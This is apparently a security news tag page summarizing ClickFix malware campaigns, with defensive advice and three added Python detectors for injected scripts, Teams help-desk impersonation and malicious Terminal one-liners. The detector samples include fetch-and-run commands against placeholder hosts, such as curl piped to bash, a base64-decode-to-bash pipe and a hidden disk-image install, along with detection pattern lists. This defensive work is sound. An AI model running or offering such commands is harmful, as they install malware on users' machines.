Last updated: July 5, 2026 at 9:01 AM UTC
Tag: clickfix (10 articles)

macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer

Palo Alto's Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or verification page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing it in Finder, finds the app inside, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. The single-command approach is stealthier than older campaigns that relied on the victim manually opening a downloaded image.

Check
Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoint telemetry for hdiutil mounts (especially ones hidden from Finder with -nobrowse) and curl downloads into /tmp that are spawned from a Terminal session.
Affected
macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
Fix
Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior, and store crypto wallets and secrets in hardware-backed protection.

DriveSurge initial-access broker hijacks thousands of sites for ClickFix and FakeUpdates, routes victims through zTDS pay-per-install network

SilentPush has detailed DriveSurge, a threat actor running large-scale malware-distribution campaigns by compromising thousands of websites and using ClickFix and FakeUpdates social engineering. ClickFix tricks visitors into copying and running malicious commands under the pretense of fixing a technical issue; FakeUpdates uses fraudulent browser-update prompts. DriveSurge operates primarily as an initial-access broker on a pay-per-install model, enabling follow-on attacks by other criminals. Compromised-site visitors are routed through a Traffic Distribution System called zTDS that profiles them before redirecting to malware-delivery infrastructure. The model lets DriveSurge monetize hijacked traffic at scale while downstream actors deploy infostealers, loaders, or ransomware. The campaign overlaps with the broader ClickFix surge across the ecosystem.

Check
Hunt web properties for unauthorized injected redirect scripts and zTDS-related indicators. Train staff that browser-update prompts and 'paste this command to fix' pages are ClickFix/FakeUpdates lures.
Affected
Visitors to thousands of compromised websites redirected through DriveSurge's zTDS. Any organization whose users browse compromised sites can receive infostealers, loaders, or ransomware via pay-per-install.
Fix
Apply SilentPush IoCs and block known zTDS infrastructure. Deploy script-integrity monitoring on your own sites. Restrict and log command execution from the Run dialog and terminals for standard users; train users never to run commands a webpage supplies.

WithSecure: Russia-linked GREYVIBE targets Ukraine with AI-assisted malware via PhantomMail, PhantomRelay RAT, and ClickFix fake-CAPTCHA chains

WithSecure has attributed persistent attacks against Ukraine and Ukraine-related entities since at least August 2025 to GREYVIBE, a previously undocumented Russian-speaking group operating in the Russian time zone and aligned with Kremlin intelligence interests. Victims span military, government, civilian, and business organizations. The group uses spear-phishing (PhantomMail, delivering JavaScript loaders from Google Drive and 4sync), a PowerShell RAT called PhantomRelay, and ClickFix-style fake-CAPTCHA pages (PhantomClick) impersonating Zoom and a fake adult-club site (PrincessClub). WithSecure describes GREYVIBE as low-to-moderately sophisticated, hampered by repeated OPSEC mistakes, but increasingly relying on generative AI and LLMs to accelerate malware development. Some members have ties to the broader Russian cybercrime ecosystem.

Check
Hunt for PhantomRelay PowerShell RAT activity and JavaScript loaders from Google Drive or 4sync links. Block known GREYVIBE ClickFix domains impersonating Zoom. Apply WithSecure IoCs.
Affected
Ukrainian military, government, civilian, and business organizations and Ukraine-related entities. Delivery via spear-phishing, fake CAPTCHA pages, and fraudulent adult-club websites since August 2025.
Fix
Block GREYVIBE C2 and loader-hosting domains per WithSecure. Restrict PowerShell for standard users. Train staff against ClickFix fake-CAPTCHA 'paste this command' prompts. Monitor Google Drive/4sync archive downloads.

FBI Director Kash Patel's merchandise site (basedapparel.com) infected with WooCommerce ClickFix macOS infostealer; site taken offline

FBI Director Kash Patel's merchandise website basedapparel[.]com was taken offline on Friday after researchers documented a multi-stage WooCommerce compromise that stole payment data and targeted Mac users with a ClickFix attack. The site displayed a fake Cloudflare CAPTCHA prompting visitors to paste a command into their terminal; the macOS-specific shell command then downloaded a script-based infostealer that targets browsers, password vaults, and cryptocurrency wallets before compressing the data, exfiltrating it to monterushy[.]com, and deleting itself. Researchers WifiRumHam and 'debbie' analyzed the live campaign on May 21-22; the site went offline on May 22. Similar infections were seen across many other compromised WooCommerce sites.

Check
Search outbound traffic for connections to monterushy[.]com and similar ClickFix C2 hosts since early May. Inventory WooCommerce sites your organization operates and confirm plugin integrity.
Affected
WooCommerce-powered e-commerce sites with vulnerable or unverified plugins. Mac users who visit compromised storefronts and are prompted to paste shell commands. Brand reputation risk for high-profile site owners.
Fix
Block monterushy[.]com at egress. Audit WooCommerce plugin authenticity via official channels. Train users (especially macOS) to never paste shell commands from a website. Apply EDR rules for ClickFix patterns.

Ghost CMS CVE-2026-26980 SQL injection exploited at scale - 700+ sites including Harvard, Oxford, DuckDuckGo serve ClickFix lures

Qianxin XLab has documented a large-scale ClickFix campaign exploiting CVE-2026-26980, an SQL injection in Ghost CMS that was disclosed and patched on February 19. The vulnerability lets unauthenticated attackers read arbitrary database content including admin API keys, which are then used to inject malicious JavaScript into articles. More than 700 domains are confirmed compromised, including Harvard, Oxford, and Auburn universities and DuckDuckGo. Victim browsers receive a fingerprinted iframe overlay impersonating a Cloudflare prompt that instructs users to paste a command into the Windows command prompt, dropping DLL loaders, JS droppers, or the UtilifySetup.exe Electron-based payload. Two distinct activity clusters compete for compromised sites.

Check
Inventory Ghost CMS sites by version. Search article HTML for unexpected inline JavaScript, iframe overlays, or fake Cloudflare prompts since February 19, 2026. Check admin-API audit logs for suspicious reads.
Affected
Ghost CMS versions 3.24.0 through 6.19.0 with the admin API exposed (default). More than 700 sites confirmed compromised, including major universities and tech companies.
Fix
Upgrade Ghost CMS to 6.19.1 or later. Rotate all admin API keys regardless of compromise status. Apply XLab IoCs and review articles for injected JavaScript. Train editors against ClickFix prompts.
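The three site-compromise stories above (DriveSurge's injected redirect scripts, the fake Cloudflare CAPTCHA on the WooCommerce storefront, and the fingerprinted iframe overlay injected into Ghost articles) all come down to the same hunt: find script or iframe content in your own pages that you did not publish. The scanner below is an added example, not code from XLab, SilentPush or the other researchers, and it uses generic ClickFix heuristics (clipboard writes, "verify you are human" text, full-viewport iframes, off-allowlist script hosts) rather than any campaign IoC. ALLOWED_SCRIPT_HOSTS and the two sample pages are constructed for the demonstration.

```python
"""Scan page HTML for ClickFix-style injected scripts and overlay iframes.

Added example, not from the XLab / SilentPush reports. Patterns are generic
ClickFix heuristics, not campaign IoCs; ALLOWED_SCRIPT_HOSTS is an assumed
per-site allowlist that you would fill from your own build manifest.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: the only third-party hosts this site legitimately loads code from.
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net"}

# Heuristics for inline scripts. ClickFix pages have to put a command on the
# victim's clipboard and dress the page up as a verification step.
INLINE_PATTERNS = [
    (re.compile(r"navigator\.clipboard\.writeText", re.I), "writes to clipboard"),
    (re.compile(r"cloudflare|verify you are human|ray id", re.I), "fake verification text"),
    (re.compile(r"\batob\s*\(|fromCharCode|unescape\s*\(", re.I), "decodes an obfuscated payload"),
    (re.compile(r"document\.write\s*\(\s*['\"]\s*<iframe", re.I), "writes an iframe"),
]


class InjectionScanner(HTMLParser):
    """Collects (kind, reason) findings for suspicious <script>/<iframe> tags."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script, self._script_src, self._buf = True, a.get("src"), []
            if self._script_src:
                host = urlparse(self._script_src).hostname or ""
                if host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(("script", f"external script from {host}"))
        elif tag == "iframe":
            style = (a.get("style") or "").lower().replace(" ", "")
            src = a.get("src") or ""
            # An iframe pinned over the whole viewport is the overlay trick.
            if "position:fixed" in style or "100vh" in style or "100vw" in style:
                self.findings.append(("iframe", f"full-viewport overlay iframe src={src!r}"))
            elif src:
                host = urlparse(src).hostname or ""
                if host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(("iframe", f"external iframe from {host}"))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            if self._script_src is None:  # inline script: inspect the body
                body = "".join(self._buf)
                for pat, why in INLINE_PATTERNS:
                    if pat.search(body):
                        self.findings.append(("inline-script", why))
            self._in_script = False


def scan_html(html):
    """Return a list of (kind, reason) findings for one page's HTML."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages (not real campaign content).
CLEAN_ARTICLE = """<html><body>
<script src="https://cdn.jsdelivr.net/npm/x.js"></script>
<script>console.log("hi")</script>
<p>Ordinary article text.</p></body></html>"""

INJECTED_ARTICLE = """<html><body><p>Ordinary article text.</p>
<script>
const c = "echo clickfix-placeholder";   // placeholder, not a real payload
navigator.clipboard.writeText(c);
document.title = "Verify you are human";
</script>
<iframe src="https://verify.example/cf"
 style="position:fixed;top:0;left:0;width:100vw;height:100vh;border:0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_ARTICLE), ("injected", INJECTED_ARTICLE)):
        print(name, scan_html(page))
```

Run it over the HTML of every published article or product page, not just the home page: the Ghost attackers injected into articles through the admin API, so a template diff alone would miss them. A hit on the allowlist rule is usually the fastest triage signal, since legitimate sites rarely start loading scripts from a new host without a deploy.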

Initial access broker KongTuke pivots from web lures to Microsoft Teams - impersonates IT help desk, drops ModeloRAT in five minutes

ReliaQuest researchers say initial access broker KongTuke has shifted from web-based ClickFix and FileFix lures to Microsoft Teams social engineering, taking as little as five minutes to gain persistent access. The attacker reaches employees from one of five rotating Microsoft 365 tenants, uses Unicode whitespace tricks to make the display name look like an internal IT help desk account, then talks the victim through pasting a PowerShell command. That command downloads a ZIP from Dropbox containing a portable WinPython runtime and a Python-based RAT called ModeloRAT. The new ModeloRAT variant adds a five-server C2 pool with automatic failover, self-update, and randomized URL paths, and several major EDR products did not detect it.

Check
Search Microsoft 365 audit logs for inbound external Teams chats from new or low-trust tenants, hunt endpoint telemetry for pythonw.exe running from %APPDATA%\WPy64-31401 (or similar WinPython paths), and review PowerShell logs for clipboard-paste-driven commands.
Affected
Any enterprise that accepts inbound Microsoft Teams chats and calls from external tenants, especially help-desk-themed approaches. Initial access broker activity is typically resold to ransomware operators within days of compromise.
Fix
Restrict external Teams chat to allowlisted partners, enforce verified caller display in Teams admin, train staff that real IT never asks for a PowerShell paste, and add EDR rules for portable Python interpreters spawning from %APPDATA%.
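The display-name trick above works because a name padded with Unicode spaces or zero-width characters renders like "IT Help Desk" while matching nothing in a string comparison. The triage script below is an added example, not ReliaQuest's tooling: it walks a constructed, simplified set of audit records (real Unified Audit Log entries have a different field layout and would need mapping) and scores each inbound chat on sender tenant, Unicode padding in the display name, help-desk impersonation, and paste-this-command language. TRUSTED_TENANTS and the GUIDs in the sample are placeholders.

```python
"""Triage inbound external Teams chats for help-desk impersonation.

Added example, not from the ReliaQuest report. Record shape is assumed:
{'Operation', 'SenderTenantId', 'SenderDisplayName', 'Message'}; tenant IDs
below are placeholders, not the attacker's real tenants.
"""
import unicodedata

# Assumed allowlist of tenants this organization has deliberately federated with.
TRUSTED_TENANTS = {"11111111-1111-1111-1111-111111111111"}

HELPDESK_WORDS = ("help desk", "helpdesk", "it support", "service desk")
PASTE_WORDS = ("win+r", "paste", "powershell", "run this")


def suspicious_whitespace(name):
    """Return non-ASCII whitespace and invisible format characters in a name.

    Zs characters such as U+2007 FIGURE SPACE look like a space; Cf characters
    such as U+200B ZERO WIDTH SPACE do not render at all. Either lets an
    external name impersonate an internal one while differing byte-for-byte.
    """
    return [ch for ch in name
            if (ch.isspace() and ch != " ") or unicodedata.category(ch) == "Cf"]


def normalize_name(name):
    """Drop format characters, fold all whitespace to ASCII spaces, lowercase."""
    cleaned = "".join(" " if ch.isspace() else ch
                      for ch in name if unicodedata.category(ch) != "Cf")
    return " ".join(cleaned.split()).lower()


def triage(record):
    """Score one audit record; returns (score, list_of_reasons)."""
    score, reasons = 0, []
    if record.get("Operation") != "MessageSent":
        return 0, reasons
    tenant = record.get("SenderTenantId", "")
    external = bool(tenant) and tenant not in TRUSTED_TENANTS
    if external:
        score += 1
        reasons.append(f"sender tenant {tenant} is not allowlisted")
    raw = record.get("SenderDisplayName", "")
    padding = suspicious_whitespace(raw)
    if padding:
        score += 2
        reasons.append("display name padded with "
                       + ", ".join(f"U+{ord(c):04X}" for c in padding))
    if external and any(w in normalize_name(raw) for w in HELPDESK_WORDS):
        score += 1
        reasons.append("external sender claims a help-desk identity")
    msg = record.get("Message", "").lower()
    if any(w in msg for w in PASTE_WORDS):
        score += 2
        reasons.append("message asks the recipient to paste or run a command")
    return score, reasons


def scan(records, threshold=4):
    """Return [(index, score, reasons)] for records at or above threshold."""
    flagged = []
    for i, rec in enumerate(records):
        s, why = triage(rec)
        if s >= threshold:
            flagged.append((i, s, why))
    return flagged


# Constructed sample records.
SAMPLE_LOG = [
    {"Operation": "MessageSent",
     "SenderTenantId": "11111111-1111-1111-1111-111111111111",
     "SenderDisplayName": "Alice Partner",
     "Message": "Meeting moved to 3pm"},
    {"Operation": "MessageSent",
     "SenderTenantId": "deadbeef-0000-0000-0000-000000000001",
     "SenderDisplayName": "IT Help\u2007Desk\u200b",
     "Message": "Hi, this is IT. Press Win+R and paste the command I sent to fix Outlook sync."},
    {"Operation": "MessageSent",
     "SenderTenantId": "deadbeef-0000-0000-0000-000000000002",
     "SenderDisplayName": "Bob Vendor",
     "Message": "Invoice attached, please review."},
]

if __name__ == "__main__":
    for i, s, why in scan(SAMPLE_LOG):
        print(i, s, why)
```

The padding check is the high-value signal: an untrusted tenant alone is noise in any organization that talks to vendors, but a display name that needs zero-width characters to look internal has no legitimate reason to exist and is worth an alert on its own.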

North Korean hackers are recording fake Zoom meetings with real crypto executives, then using the footage and AI-generated lookalikes to scam the next target

North Korea's BlueNoroff group has built a self-reinforcing deepfake pipeline that turns each victim into the lure for the next attack. Arctic Wolf documented the pattern: attackers send a Calendly invite that looks like a normal business meeting, then quietly swap the Google Meet link for a typo-squatted Zoom URL. When the target joins, a fake Zoom interface secretly records their webcam feed while a clipboard-injection attack drops malware. The captured footage is mixed with AI-generated lookalikes (built using ChatGPT for synthetic portraits) and recycled into the next attack. Arctic Wolf found 950 files in BlueNoroff's media server. 80% of identified targets are crypto executives.

Check
Brief every executive in your organization that any 'Zoom SDK update' prompt asking them to copy and paste commands into their terminal during a meeting is to be treated as a malware drop; it is the BlueNoroff lure.
Affected
Cryptocurrency executives, Web3 founders, and CEOs at fintech and blockchain companies - 45% of identified targets are CEOs and founders, 80% are in crypto or adjacent sectors. Anyone whose webcam footage was exfiltrated by BlueNoroff is now appearing as a fake meeting participant targeting their professional network.
Fix
Train executives that any 'SDK update' prompt during a meeting is hostile - real Zoom and Teams never ask users to paste commands into terminals. Verify out-of-band before joining any meeting from an unsolicited Calendly link. Block known BlueNoroff infrastructure (Petrosky Cloud LLC AS400897 and the 80 typosquat domains in Arctic Wolf's IoCs). Consider a dedicated meeting device for high-risk executives.

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.
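The Fix above and the Atomic Stealer story at the top of this page describe the same macOS chain from the process side: a one-liner pasted into Terminal that fetches (curl/wget) or decodes (base64) something, hands it to a shell or osascript, or mounts a disk image with hdiutil and launches the app inside. The detector below is an added example, not code from Unit 42 or ANY.RUN. It splits each command line into its pipeline stages rather than grepping for keywords, so "curl | bash" and "echo ... | base64 -d | bash" are both caught by the same rule, while a lone curl or a lone hdiutil is not. The event shape, the "-nobrowse" and quarantine-stripping heuristics, and the sample events are assumptions for the demonstration.

```python
"""Flag Terminal-spawned commands that fetch or decode content and run it.

Added example, not from the Unit 42 / ANY.RUN reports. Events are assumed to
be {'parent': <process name>, 'cmdline': <str>} as an EDR would export them;
the sample events and URLs below are constructed.
"""
import re
import shlex

FETCHERS = {"curl", "wget"}
EXECUTORS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
TERMINALS = {"Terminal", "iTerm2"}  # a parent here means the user pasted it
THRESHOLD = 4


def split_pipeline(cmdline):
    """Split a one-liner on |, ||, &&, ; into per-stage token lists."""
    stages = []
    for seg in re.split(r"\|\||&&|\||;", cmdline):
        seg = seg.strip()
        if not seg:
            continue
        try:
            toks = shlex.split(seg)
        except ValueError:          # unbalanced quotes: fall back to whitespace
            toks = seg.split()
        if toks:
            stages.append(toks)
    return stages


def basename(tok):
    return tok.rsplit("/", 1)[-1]


def is_decode(stage):
    return basename(stage[0]) == "base64" and any(
        t in ("-d", "-D", "--decode") for t in stage[1:])


def score_event(event):
    """Score one process event; returns (score, reasons)."""
    stages = split_pipeline(event["cmdline"])
    names = [basename(s[0]) for s in stages]
    score, reasons = 0, []

    # Stage that produces code or bytes: a network fetch or a base64 decode.
    producers = [i for i, s in enumerate(stages)
                 if names[i] in FETCHERS or is_decode(s)]
    if producers:
        p = producers[0]
        if any(n in EXECUTORS for n in names[p + 1:]):
            score += 3
            reasons.append("fetched/decoded content handed to an interpreter")
        if any(t.startswith("/tmp") for s in stages[p:] for t in s):
            score += 1
            reasons.append("staging under /tmp")
    if any(is_decode(s) for s in stages):
        score += 1
        reasons.append("base64-decoded stage (obfuscated command)")

    for s in stages:
        n = basename(s[0])
        if n == "hdiutil" and "attach" in s and "-nobrowse" in s:
            score += 2
            reasons.append("disk image mounted hidden from Finder")
        elif n == "open" and any(t.endswith(".app") for t in s[1:]):
            score += 1
            reasons.append("app launched from the command line")
        elif n == "xattr" and "com.apple.quarantine" in s:  # assumed heuristic
            score += 1
            reasons.append("quarantine attribute stripped")

    if event.get("parent") in TERMINALS:
        score += 1
        reasons.append("spawned from an interactive terminal")
    return score, reasons


def hunt(events, threshold=THRESHOLD):
    """Return [(index, score, reasons)] for events at or above threshold."""
    out = []
    for i, ev in enumerate(events):
        s, why = score_event(ev)
        if s >= threshold:
            out.append((i, s, why))
    return out


# Constructed sample events; dl.example / api.example are placeholders.
SAMPLE_EVENTS = [
    {"parent": "Terminal",
     "cmdline": "curl -fsSL https://dl.example/v.dmg -o /tmp/v.dmg && "
                "hdiutil attach -nobrowse /tmp/v.dmg && "
                "open /Volumes/Installer/Installer.app"},
    {"parent": "Terminal", "cmdline": "echo 'aGVsbG8=' | base64 -d | bash"},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://api.example/health"},
    {"parent": "launchd",
     "cmdline": "/usr/bin/hdiutil attach -nobrowse /Users/me/Downloads/app.dmg"},
    {"parent": "Terminal", "cmdline": "curl -s https://dl.example/x.sh | bash"},
]

if __name__ == "__main__":
    for i, s, why in hunt(SAMPLE_EVENTS):
        print(i, s, why)
```

Events 0, 1 and 4 are flagged; event 2 (a developer curling a health endpoint) and event 3 (hdiutil -nobrowse from a non-interactive parent, which installers also do) stay below threshold. Tune THRESHOLD against a week of your own Terminal telemetry before alerting on it, and treat the hdiutil rule as corroboration rather than a detection by itself.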

macOS Tahoe 26.4 blocks ClickFix paste attacks in Terminal - update your Mac fleet now

Apple shipped an undocumented security feature in macOS Tahoe 26.4 that directly targets ClickFix attacks - the social engineering technique behind the Infinity Stealer campaign we covered last week. When a user tries to paste a potentially harmful command into Terminal, macOS now intercepts it with a warning before anything executes. The feature only covers Apple's built-in Terminal app, not third-party alternatives like iTerm2. A 'Paste Anyway' option remains for power users.

Check
Check if your Mac fleet is running macOS Tahoe 26.4 or later.
Affected
Any macOS user on versions prior to 26.4 who may encounter ClickFix social engineering attacks via fake CAPTCHA pages or tech support sites.
Fix
Update to macOS Tahoe 26.4. Push the update via MDM for managed fleets. Train staff to never paste commands from websites into Terminal regardless of the prompt - the protection only covers Terminal.app, not third-party terminals.

New Infinity Stealer malware targets macOS through fake Cloudflare CAPTCHA pages

A new macOS infostealer called Infinity Stealer tricks users through fake Cloudflare CAPTCHA pages - the technique known as ClickFix. Victims paste a command into Terminal thinking they are proving they are human, but it silently installs the malware. The payload is compiled with Nuitka, which turns Python into native macOS binaries that are much harder for security tools to detect. It steals browser credentials, Keychain data, and crypto wallets.

Check
Alert your team - especially Mac users - to never paste unknown commands into Terminal from websites.
Affected
Any macOS user who encounters a Cloudflare-style CAPTCHA asking them to open Terminal.
Fix
Train staff to recognize fake CAPTCHA pages. Block the domain update-check[.]com. Run endpoint detection on macOS devices.